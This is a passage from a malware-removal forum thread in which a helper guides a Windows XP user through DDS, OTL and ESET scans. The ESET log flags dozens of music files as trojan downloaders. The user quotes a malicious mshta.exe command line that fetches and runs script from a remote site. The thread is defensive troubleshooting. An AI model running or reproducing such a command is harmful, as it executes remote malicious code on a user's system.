    2010-12-04 23:30:18 2137088 -c----w- c:\windows\system32\dllcache\ntkrnlmp.exe
    2010-12-04 23:30:17 2058368 -c----w- c:\windows\system32\dllcache\ntkrnlpa.exe
    2010-12-04 23:30:17 2016768 -c----w- c:\windows\system32\dllcache\ntkrpamp.exe
    2010-12-04 08:54:09 -------- d-----w- C:\FIX THIS PC
    2010-12-04 08:23:35 -------- d-----w- c:\program files\Temp File Cleaner
    2010-12-04 06:26:42 -------- d-----w- c:\docume~1\alluse~1\applic~1\MFAData
    2010-12-04 06:18:56 -------- d-----w- c:\docume~1\alluse~1\applic~1\PC Tools
    2010-12-04 05:31:42 -------- d-----w- C:\Riot Games
    2010-12-04 05:31:29 -------- d-----w- c:\program files\Riot Games
    2010-12-04 05:04:25 -------- d-----w- c:\docume~1\marshall\locals~1\applic~1\PMB Files
    2010-12-04 05:04:18 -------- d-----w- c:\docume~1\alluse~1\applic~1\PMB Files
    2010-12-04 05:03:17 -------- d-----w- c:\program files\Pando Networks
    2010-12-04 04:11:53 -------- d-----w- c:\program files\IObit
    2010-12-04 03:58:20 26600 ----a-w- c:\windows\system32\drivers\GEARAspiWDM.sys
    2010-12-04 03:58:20 107368 ----a-w- c:\windows\system32\GEARAspi.dll
    2010-12-04 03:57:23 -------- d-----w- c:\program files\iPod
    2010-12-04 03:57:18 -------- d-----w- c:\program files\iTunes
    2010-12-04 03:56:45 -------- d-----w- c:\program files\Bonjour
    2010-12-04 03:36:16 16400 ----a-w- c:\windows\system32\drivers\LNonPnP.sys
    2010-12-04 03:35:16 -------- d-----w- c:\docume~1\marshall\locals~1\applic~1\Logishrd
    2010-12-04 03:34:43 10448 ----a-w- c:\windows\system32\drivers\LBeepKE.sys
    2010-12-04 03:30:55 -------- d-----w- c:\docume~1\marshall\applic~1\Logishrd
    2010-12-04 03:04:18 -------- d-----w- C:\f187b0792ef2605282a8
    2010-12-04 02:58:54 -------- d-----w- C:\MISC Stuff
    2010-12-01 03:38:00 9216 -c--a-w- c:\windows\system32\dllcache\wamps51.dll
    2010-12-01 03:38:00 76800 -c--a-w- c:\windows\system32\dllcache\wam51.dll
    2010-12-01 03:38:00 53248 -c--a-w- c:\windows\system32\dllcache\wamreg51.dll
    2010-12-01 03:38:00 41600 -c--a-w- c:\windows\system32\dllcache\weitekp9.dll
    2010-12-01 03:38:00 31232 -c--a-w- c:\windows\system32\dllcache\weitekp9.sys
    2010-12-01 03:36:59 400384 -c--a-w- c:\windows\system32\dllcache\fxsxp32.dll
    2010-12-01 03:34:38 16384 -c--a-w- c:\windows\system32\dllcache\isignup.exe
    2010-12-01 03:34:38 16384 ----a-w- c:\program files\internet explorer\connection wizard\isignup.exe
    2010-12-01 03:32:55 44544 -c--a-w- c:\windows\system32\dllcache\tscupgrd.exe
    2010-12-01 03:32:55 44544 ----a-w- c:\windows\system32\tscupgrd.exe
    2010-12-01 02:46:57 13312 -c--a-w- c:\windows\system32\dllcache\irclass.dll
    2010-12-01 02:46:57 13312 ----a-w- c:\windows\system32\irclass.dll
    2010-12-01 02:46:56 24661 -c--a-w- c:\windows\system32\dllcache\spxcoins.dll
    2010-12-01 02:46:56 24661 ----a-w- c:\windows\system32\spxcoins.dll
    2010-12-01 02:46:40 13753 ----a-r- c:\windows\SETE2.tmp
    2010-12-01 02:46:36 1086058 ----a-r- c:\windows\SETD6.tmp
    2010-12-01 02:46:35 1042903 ----a-r- c:\windows\SETD5.tmp
    2010-11-27 02:10:57 -------- d-----w- c:\docume~1\marshall\applic~1\TuneUp Software
    2010-11-27 02:09:52 -------- d-----w- c:\docume~1\alluse~1\applic~1\TuneUp Software
    2010-11-27 02:07:11 -------- d-sh--w- c:\docume~1\alluse~1\applic~1\{24036256-BFDB-4CD3-BE8A-A3D6160F2E16}
    2010-11-14 03:38:22 -------- dc-h--w- c:\docume~1\alluse~1\applic~1\{0151C9FC-719D-4459-B1E2-4685CC6E62A8}
    2010-11-12 07:15:11 -------- dc-h--w- c:\docume~1\marshall\locals~1\applic~1\{0691F710-1ECA-4B5A-9727-25554F1BFDC6}
    2010-11-12 06:29:50 1480 ----a-w- c:\windows\system32\ealregsnapshot1.reg
    2010-11-12 06:29:43 -------- d-----w- c:\docume~1\marshall\locals~1\applic~1\Downloaded Installations
    2010-11-12 06:20:19 22328 ----a-w- c:\windows\system32\drivers\PnkBstrK.sys
    2010-11-12 06:20:19 22328 ----a-w- c:\docume~1\marshall\applic~1\PnkBstrK.sys
    2010-11-12 06:20:02 103736 ----a-w- c:\windows\system32\PnkBstrB.exe
    2010-11-12 06:20:01 669184 ----a-w- c:\windows\system32\pbsvc.exe
    2010-11-12 06:20:01 66872 ----a-w- c:\windows\system32\PnkBstrA.exe
    2010-11-09 05:03:28 -------- d-----w- c:\docume~1\marshall\locals~1\applic~1\Threat Expert
    2010-11-09 05:00:20 -------- d-----r- c:\program files\Skype
    2010-11-06 00:37:34 103864 ----a-w- c:\program files\mozilla firefox\plugins\nppdf32.dll
    2010-11-06 00:37:34 103864 ----a-w- c:\program files\internet explorer\plugins\nppdf32.dll

    ==================== Find3M ====================

    2010-12-04 04:37:06 240592 ----a-w- c:\windows\system32\nvdrsdb1.bin
    2010-12-04 04:37:06 1 ----a-w- c:\windows\system32\nvdrssel.bin
    2010-12-04 04:37:02 240592 ----a-w- c:\windows\system32\nvdrsdb0.bin
    2010-11-16 09:34:42 19722344 ----a-w- c:\windows\RTHDCPL.EXE
    2010-11-11 02:27:00 55912 ----a-w- c:\windows\system32\RtkCoInstXP.dll
    2010-11-03 07:15:50 84584 ----a-w- c:\windows\SOUNDMAN.EXE
    2010-11-03 07:15:50 359016 ----a-w- c:\windows\vncutil.exe
    2010-11-03 07:15:50 1833576 ----a-w- c:\windows\SkyTel.exe
    2010-11-03 07:15:38 891496 ----a-w- c:\windows\system32\RTSndMgr.CPL
    2010-11-03 07:15:26 9721960 ----a-w- c:\windows\RTLCPL.EXE
    2010-11-03 07:15:26 1489512 ----a-w- c:\windows\RtlUpd.exe
    2010-11-03 07:14:40 129640 ----a-w- c:\windows\RtkAudioService.exe
    2010-11-03 07:14:04 2180712 ----a-w- c:\windows\MicCal.exe
    2010-11-03 07:13:54 285288 ----a-w- c:\windows\system32\ALSNDMGR.CPL
    2010-11-03 07:13:54 2815592 ----a-w- c:\windows\ALCWZRD.EXE
    2010-11-03 07:13:42 64104 ----a-w- c:\windows\ALCMTR.EXE
    2010-10-27 23:46:10 1251944 ----a-w- c:\windows\RtlExUpd.dll
    2010-10-21 12:00:20 348160 ----a-w- c:\windows\system32\msvcr71.dll
    2010-10-21 12:00:19 499712 ----a-w- c:\windows\system32\msvcp71.dll
    2010-10-16 18:55:00 888424 ----a-w- c:\windows\system32\nvdispco32.dll
    2010-10-16 18:55:00 6359552 ----a-w- c:\windows\system32\nv4_disp.dll
    2010-10-16 18:55:00 61440 ----a-w- c:\windows\system32\OpenCL.dll
    2010-10-16 18:55:00 4882432 ----a-w- c:\windows\system32\nvcuda.dll
    2010-10-16 18:55:00 2932840 ----a-w- c:\windows\system32\nvcuvid.dll
    2010-10-16 18:55:00 2666600 ----a-w- c:\windows\system32\nvcuvenc.dll
    2010-10-16 18:55:00 2293194 ----a-w- c:\windows\system32\nvdata.bin
    2010-10-16 18:55:00 1462272 ----a-w- c:\windows\system32\nvapi.dll
    2010-10-16 18:55:00 14532608 ----a-w- c:\windows\system32\nvoglnt.dll
    2010-10-16 18:55:00 13012992 ----a-w- c:\windows\system32\nvcompiler.dll
    2010-10-16 01:04:22 81920 ----a-w- c:\windows\system32\nvwddi.dll
    2010-10-16 01:04:16 277608 ----a-w- c:\windows\system32\nvmccs.dll
    2010-10-16 01:04:16 13851752 ----a-w- c:\windows\system32\nvcpl.dll
    2010-10-16 01:04:16 110696 ----a-w- c:\windows\system32\nvmctray.dll
    2010-10-16 01:04:14 156776 ----a-w- c:\windows\system32\nvsvc32.exe
    2010-10-16 01:04:14 145000 ----a-w- c:\windows\system32\nvcolor.exe
    2010-10-07 01:23:02 91424 ----a-w- c:\windows\system32\dnssd.dll
    2010-10-07 01:23:02 197920 ----a-w- c:\windows\system32\dnssdX.dll
    2010-10-07 01:23:02 107808 ----a-w- c:\windows\system32\dns-sd.exe
    2010-09-30 06:34:03 21840 ----atw- c:\windows\system32\SIntfNT.dll
    2010-09-30 06:34:03 17212 ----atw- c:\windows\system32\SIntf32.dll
    2010-09-30 06:34:03 12067 ----atw- c:\windows\system32\SIntf16.dll
    2010-09-28 04:44:52 4184352 ----a-w- c:\windows\system32\usbaaplrc.dll
    2010-09-08 01:17:46 94208 ----a-w- c:\windows\system32\QuickTimeVR.qtx
    2010-09-08 01:17:46 69632 ----a-w- c:\windows\system32\QuickTime.qts
    2010-09-07 20:09:01 26216 ----a-w- c:\windows\system32\nvhdap32.dll
    2010-09-07 20:08:53 813672 ----a-w- c:\windows\system32\nvgenco32.dll
    2008-03-08 21:25:10 236 ---ha-w- c:\program files\common files\dx.reg

    ============= FINISH: 21:47:28.87 ===============


    Thanks so much for replying and waiting for me! :D
     
    Cosmic Jester,
    #5
  7. 2010/12/05
    Cosmic Jester

    Cosmic Jester Inactive Thread Starter

    Joined:
    2010/12/04
    Messages:
    22
    Likes Received:
    0
    I think the repair shop just reinstalled Windows with SP2 and not 3, because I've JUST noticed that I have not installed Windows XP SP3, I won't install it yet until given the green light.

    But as long as you now know that your dealing with a Windows XP 32Bit SP2 Operating System, I thought that would be helpful.
    I also found that the mshta.exe (The Funny Squirrel one) is duplicating itself with every hour (approximently).

    EDIT: My post with all my logs has been sent, but it needs to be reviewed by a moderator. Sorry it took so long, GMER took around 5-6 hours to complete the scan.
     
    Last edited: 2010/12/05
    Cosmic Jester,
    #6
  8. 2010/12/05
    crunchie

    crunchie Inactive

    Joined:
    2010/01/12
    Messages:
    982
    Likes Received:
    5
    That mshta.exe file is legit in the location shown in the log.

    I cannot see anything bad in those logs.

    Please Run the ESET Online Scanner and post the ScanLog with your post for assistance.
    • You will need to use Internet Explorer to complete this scan.
    • You will need to temporarily Disable your current Anti-virus program.
    • Be sure the option to Remove found threats is Un-checked at this time (we may have it clean what it finds at a later time), and the option to Scan unwanted applications is Checked.
    • When you have completed that scan, a scanlog ought to have been created and located at C:\Program Files\EsetOnlineScanner\log.txt. Please post that log for us as directed below.

    NOTE: If you are unable to complete the ESET scan, please try another from the list below:

     
    crunchie,
    #7
  9. 2010/12/05
    Cosmic Jester

    Cosmic Jester Inactive Thread Starter

    Joined:
    2010/12/04
    Messages:
    22
    Likes Received:
    0
    Internet Explorer just crashes upon opening it.
    Do any of the other scanners work on Mozilla Firefox?

    Here is some extra info taken from the mshta.exe Properties (Thanks to Process Explorer) to better explain that this mshta.exe is different from the legit mshta.exe.

    Suspected mshta.exe:

    Path: C:\WINDOWS\System32\mshta.exe
    Command Line: mshta.exe http://funnysquirrelshow.com/gnjswp.php?jgnapf=89248952860608
    Current Directory: C:\WINDOWS\system32\

    But like I have asked, will any of the other scanners work with Mozilla Firefox? I haven't updated Internet Explorer since I haven't got SP3 installed due to having a semi-fresh install of Windows XP (Reinstalled OS, but most files from my prior to the reinstall were transferred).
    Sorry for making such a fuss! D:

    EDIT: It's getting late, so I will head off to bed, but I will leave my PC on during the night and disconnect the internet as good measure, of course, my next reply will be a long wait.
     
    Last edited: 2010/12/05
    Cosmic Jester,
    #8
  10. 2010/12/05
    crunchie

    crunchie Inactive

    Joined:
    2010/01/12
    Messages:
    982
    Likes Received:
    5
    You should be able to use FF with the following;

    Go to Kaspersky website and perform an online antivirus scan.

    1. Disable your active antivirus program.
    2. Read through the requirements and privacy statement and click on the Accept button.
    3. It will start downloading and installing the scanner and virus definitions. You will be prompted to install an application from Kaspersky. Click Run.
    4. When the downloads have finished, click on Settings.
    5. Make sure these boxes are checked (ticked). If they are not, please tick them and click on the Save button:

    • Spyware, Adware, Dialers, and other potentially dangerous programs
      [*] Archives
      [*] Mail databases
    6. Click on My Computer under Scan.
    7. Once the scan is complete, it will display the results. Click on View Scan Report.
    8. You will see a list of infected items there. Click on Save Report As....
    9. Save this report to a convenient place. Change the Files of type to Text file (.txt) before clicking on the Save button. Then post it here.

    ==================

    Download OTL to your Desktop.

    * Double click on the icon to run it. Make sure all other windows are closed and to let it run uninterrupted.
    * Under the Custom Scan box paste this in:


    netsvcs
    %SYSTEMDRIVE%\*.exe
    /md5start
    eventlog.dll
    scecli.dll
    netlogon.dll
    cngaudit.dll
    sceclt.dll
    ntelogon.dll
    logevent.dll
    iaStor.sys
    nvstor.sys
    atapi.sys
    IdeChnDr.sys
    viasraid.sys
    AGP440.sys
    vaxscsi.sys
    nvatabus.sys
    viamraid.sys
    nvata.sys
    nvgts.sys
    iastorv.sys
    ViPrt.sys
    eNetHook.dll
    ahcix86.sys
    KR10N.sys
    nvstor32.sys
    /md5stop
    %systemroot%\*. /mp /s
    %systemroot%\system32\*.dll /lockedfiles
    %systemroot%\System32\config\*.sav
    CREATERESTOREPOINT


    * Click the Quick Scan button. Do not change any settings unless otherwise told to do so. The scan wont take long.
    • When the scan completes, it will open two notepad windows: OTL.txt and Extras.txt. These are saved in the same location as OTL.
    • Please copy (Edit->Select All, Edit->Copy) the contents of these files, one at a time, and post them back here.
     
    crunchie,
    #9
  11. 2010/12/05
    crunchie

    crunchie Inactive

    Joined:
    2010/01/12
    Messages:
    982
    Likes Received:
    5
    I see you have P2P software ( Azures, Limewire, BitTorrent, uTorrent etc…) installed on your machine. We are not here to pass judgment on file-sharing as a concept. However, we will warn you that engaging in this activity and having this kind of software installed on your machine will always make you more susceptible to re-infections. It may be contributing to your current situation. This page will give you further information.

    Please note: Even if you are using a "safe" P2P program, it is only the program that is safe. You will be sharing files from uncertified sources, and these are often infected. The bad guys use P2P filesharing as a major conduit to spread their wares and their infections.

    References for the risk of these programs are here, and here.

    I would strongly recommend that you uninstall them, and read the links above for educational value!

    Note: Please be advised that continued use of these programs after being warned of the danger of infections from them, may result in the discontinued help of future cleaning of your system here at WindowsBBS Malware and Virus removal.
     
    crunchie,
    #10
  12. 2010/12/05
    Cosmic Jester

    Cosmic Jester Inactive Thread Starter

    Joined:
    2010/12/04
    Messages:
    22
    Likes Received:
    0
    I'm back
    Yeah, I am well aware of the threats of P2P programs, which I may just leave that stuff alone for the time being. Thanks though.
    However, thing is, I used to have 2 hard drives, but my second one failed (hence why it had to go to the repair shop, so for now I just have one hard drive), and all my torrent clients were on that, so there may just be old registries which can't seem to go away. (If your willing to help me get rid of those afterward, that would be great).

    Kaspersky doesn't appear to work due to a license expiry, will it be okay to use one of the other suggested online scanners?
    I have also not started to use OLT yet until I have done the online scan like you said.
     
    Cosmic Jester,
    #11
  13. 2010/12/05
    crunchie

    crunchie Inactive

    Joined:
    2010/01/12
    Messages:
    982
    Likes Received:
    5
    Try one of these instead;

    Please Run the ESET Online Scanner and post the ScanLog with your post for assistance.
    • You will need to use Internet Explorer to complete this scan.
    • You will need to temporarily Disable your current Anti-virus program.
    • Be sure the option to Remove found threats is Un-checked at this time (we may have it clean what it finds at a later time), and the option to Scan unwanted applications is Checked.
    • When you have completed that scan, a scanlog ought to have been created and located at C:\Program Files\EsetOnlineScanner\log.txt. Please post that log for us as directed below.

    NOTE: If you are unable to complete the ESET scan, please try another from the list below:

     
    crunchie,
    #12
  14. 2010/12/05
    Cosmic Jester

    Cosmic Jester Inactive Thread Starter

    Joined:
    2010/12/04
    Messages:
    22
    Likes Received:
    0
    I have the following options for ESET Online Scanner:

    [ ] Remove Found Threats
    [ ] Scan Archives

    ADVANCED:
    [x] Scan for Potentially Unwanted Applications
    [ ] Scan for Potentially Unsafe Applications
    [x] Enable Anti-Stealth Technology
    Scan Targets: Operating Memory and Local Drives
    [ ] Use custom proxy settings

    Before I press start, would you like me to check any other boxes? (I just really want this done right, you know? :p)
    After your reply, I will post the logs from ESET and OLT.
    Thanks for putting up with me so far! :D
     
    Cosmic Jester,
    #13
  15. 2010/12/05
    crunchie

    crunchie Inactive

    Joined:
    2010/01/12
    Messages:
    982
    Likes Received:
    5
    Just as you have it there :)
     
    crunchie,
    #14
  16. 2010/12/05
    Cosmic Jester

    Cosmic Jester Inactive Thread Starter

    Joined:
    2010/12/04
    Messages:
    22
    Likes Received:
    0
    Here you go, the logs are in this order (Post is past it's maximum character limit, so each one will be in it's own post):
    - ESET
    - OTL
    - Extras

    ESETSmartInstaller@High as downloader log:
    all ok
    # version=7
    # OnlineScannerApp.exe=1.0.0.1
    # OnlineScanner.ocx=1.0.0.6211
    # api_version=3.0.2
    # EOSSerial=2bc5ca2fa2e32744b3cf566b4b8d1825
    # end=finished
    # remove_checked=false
    # archives_checked=false
    # unwanted_checked=true
    # unsafe_checked=false
    # antistealth_checked=true
    # utc_time=2010-12-06 01:38:11
    # local_time=2010-12-06 12:38:11 (+1000, AUS Eastern Standard Time)
    # country= "Australia "
    # lang=1033
    # osver=5.1.2600 NT Service Pack 2
    # compatibility_mode=512 16777215 100 0 0 0 0 0
    # compatibility_mode=8192 67108863 100 0 5389 5389 0 0
    # scanned=233207
    # found=190
    # cleaned=0
    # scan_time=4997
    C:\Documents and Settings\Marshall\My Documents\My Music\Da Lench Mob - Gorillas in the Mist.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Eminem Show\01 Curtains Up (Skit).mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Eminem Show\02 White America.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Eminem Show\03 Business.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Eminem Show\04 Cleanin Out My Closet.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Eminem Show\05 Square Dance.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Eminem Show\06 The Kiss (Skit).mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Eminem Show\07 Soldier.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Eminem Show\08 Say Goodbye Hollywood.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Eminem Show\09 Drips.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Eminem Show\10 Without Me.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Eminem Show\11 Paul Rosenberg (Skit).mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Eminem Show\12 Sing for the Moment.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Eminem Show\13 Superman.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Eminem Show\14 Hailie's Song.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Eminem Show\15 Steve Berman (Skit).mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Eminem Show\16 When the Music Stops.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Eminem Show\17 Say What You Say.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Eminem Show\18 'Till I Collapse.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Eminem Show\19 My Dad's Gone Crazy.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Eminem Show\20 Curtains Close (Skit).mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Marshall Mathers LP [Australian Import Bonus CD] Disc 1\01 Public Service Announcement 2000.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Marshall Mathers LP [Australian Import Bonus CD] Disc 1\02 Kill You.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Marshall Mathers LP [Australian Import Bonus CD] Disc 1\03 Stan.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Marshall Mathers LP [Australian Import Bonus CD] Disc 1\04 Paul (Skit).mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Marshall Mathers LP [Australian Import Bonus CD] Disc 1\05 Who Knew.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Marshall Mathers LP [Australian Import Bonus CD] Disc 1\06 Steve Berman.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Marshall Mathers LP [Australian Import Bonus CD] Disc 1\07 The Way I Am.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Marshall Mathers LP [Australian Import Bonus CD] Disc 1\08 The Real Slim Shady.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Marshall Mathers LP [Australian Import Bonus CD] Disc 1\09 Remember Me-.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Marshall Mathers LP [Australian Import Bonus CD] Disc 1\10 I'm Back.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Marshall Mathers LP [Australian Import Bonus CD] Disc 1\11 Marshall Mathers.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Marshall Mathers LP [Australian Import Bonus CD] Disc 1\12 Ken Kaniff (Skit).mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Marshall Mathers LP [Australian Import Bonus CD] Disc 1\13 Drug Ballad.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Marshall Mathers LP [Australian Import Bonus CD] Disc 1\14 Amityville.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Marshall Mathers LP [Australian Import Bonus CD] Disc 1\15 Bitch Please II.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Marshall Mathers LP [Australian Import Bonus CD] Disc 1\16 Kim.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Marshall Mathers LP [Australian Import Bonus CD] Disc 1\17 Under the Influence.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Marshall Mathers LP [Australian Import Bonus CD] Disc 1\18 Criminal.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Slim Shady LP\01 Public Service Announcement.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Slim Shady LP\02 My Name Is.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Slim Shady LP\03 Guilty Conscience.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Slim Shady LP\04 Brain Damage.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Slim Shady LP\05 Paul.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Slim Shady LP\06 If I Had.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Slim Shady LP\07 97' Bonnie & Clyde.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Slim Shady LP\08 Bitch.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Slim Shady LP\09 Role Model.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Slim Shady LP\10 Lounge.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Slim Shady LP\11 My Fault.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Slim Shady LP\12 Ken Kaniff.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Slim Shady LP\13 Cum on Everybody.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Slim Shady LP\14 Rock Bottom.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Slim Shady LP\15 Just Don't Give a ****.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Slim Shady LP\16 Soap.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Slim Shady LP\17 As the World Turns.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Slim Shady LP\18 I'm Shady.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Slim Shady LP\19 Bad Meets Evil.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Slim Shady LP\20 Still Don't Give a ****.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\01 - Little Things.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\02 - WaldorfWorldwide.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\03 - The Motivation Proclamation.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
